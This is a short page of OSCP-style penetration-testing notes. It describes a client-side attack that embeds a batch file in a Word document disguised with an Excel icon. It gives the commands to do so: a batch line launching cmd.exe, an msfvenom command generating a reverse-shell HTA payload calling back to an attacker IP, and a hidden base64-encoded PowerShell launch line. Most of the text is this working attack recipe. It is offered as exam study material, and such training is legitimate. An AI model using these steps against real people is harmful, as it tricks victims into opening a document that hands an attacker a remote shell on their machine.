O
O
OSCP Notes
Search…
⌃K

Word Object linking (client-side)

echo START cmd.exe > launch.bat
Exploiting DDE (it's been patched since 2017) but we can still exploit it (batch older version of powershell and VBscript, but it's still functional)
After creating the bat, we need to link it to a word document.
Open Microsoft Word > create a new doc > insert > object menu > create from file and choose the launch.bat that you created.
We can also obfuscate the appearance and the file name that will appear on the client's computer by clicking the change icon button such as an excel file.
save it as Word 97-2003.
Once a victim double clicks the xls in the document, it will open up a cmd shell.

Using base64 powershell

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
copy the powershell -nop -w hidden -e and the base64 encoded payload
and create a batch file and follow the same process as above.
START powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBj....
If successful, you will receive a reverse shell once the client-side attack is done.